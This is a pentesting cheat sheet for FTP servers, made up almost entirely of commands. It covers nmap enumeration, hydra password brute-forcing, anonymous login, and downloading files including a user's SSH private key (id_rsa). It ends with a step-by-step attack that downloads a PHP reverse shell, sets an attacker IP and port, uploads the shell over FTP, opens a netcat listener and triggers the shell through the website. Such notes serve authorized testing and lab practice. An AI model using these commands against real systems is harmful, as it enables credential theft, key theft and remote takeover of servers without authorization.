FTP (File Transfer Protocol) Pentesting

FTP is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network. Default ports are 20 (for data), 21 (for control).

Enumeration

nmap --script ftp-anon -p 21 <target-ip>
nmap --script ftp-vuln* -p 21 <target-ip>
nmap --script ftp-* -p 21 <target-ip>

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> ftp
hydra -L username.txt -p password <target-ip> ftp

hydra -l username -P passwords.txt ftp://<target-ip>
hydra -L usernames.txt -p password ftp://<target-ip>

Investigation

Banner Grabbing

nc <target-ip> 21

Using OpenSSL

First off, open listener.

nc -vn <target-ip> 21

Then run the command below.

openssl s_client -connect <target-ip>:21 -starttls ftp

Configuration Files

cat /etc/vsftpd.conf
cat /etc/vsftpd/vsftpd.conf

Connect

Using ftp

ftp <target-ip>
ftp <target-ip> <target-port>

Sometimes we might be able to the anonymous login.
Not likely, but worth a try.

ftp <target-ip>
username: anonymous
password: anonymous

Using lftp

lftp is the enhanced version of ftp. It's more easier to use than ftp.

lftp
lftp :-> connect
# or
lftp 10.0.0.1

# Login with username and password
lftp 10.0.0.1:-> login username password

Commands in FTP

After connecting FTP, we can search directories and files, then download them to your local machine, and put local files to the target system.
The FTP commands are almost the same as Linux commands.

ftp> pwd
ftp> cd
ftp> ls
# Print the content of the file
ftp> get example.txt -

# Switch to passive mode.
ftp> passive

# Print usage
ftp> ?

Download Files

To download files to local machine,

ftp> get example.txt
ftp> get home/user/.ssh/id_rsa ./id_rsa

# recursive
wget -r --user='username' --password='password' ftp://<target-ip>/sample

Upload Files

ftp> put example.txt

Reverse Shell over Website

If the target website allows users to access the ftp directory, we can upload the exploit for the reverse shell and get a shell.

1. Download the Payload

   Get the payload for the reverse shell from this repository.

   wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
   
   # --------------------------------------------------------------------------------
   
   # Edit some variables in shell.php
   $ip = '<your-local-ip>';
   $port = 1234;
   

2. Upload the Payload to FTP Directory

   Connect to FTP and upload the payload.

   ftp <target-ip>
   
   # Upload the payload you downloaded
   ftp> put shell.php
   

3. Get a Shell

   At first, w need to open listener in your local machine.

   nc -lvnp 1234
   

   In a web browser, access to "http://vulnerable.com/path/to/ftp/shell.php".
   We should get a target shell.

Start FTP Server

1. Install vsftpd

sudp apt install vsftpd

To check the config file for vsftpd, run the following command.

less /etc/vsftpd.conf

2. Start FTP Server

Below are commands for starting FTP server and checking the status.

sudo systemctl start vsftpd
sudo systemctl status vsftpd

If you’ve updated the config file, you need to restart vsftpd.

sudo systemctl restart vsftpd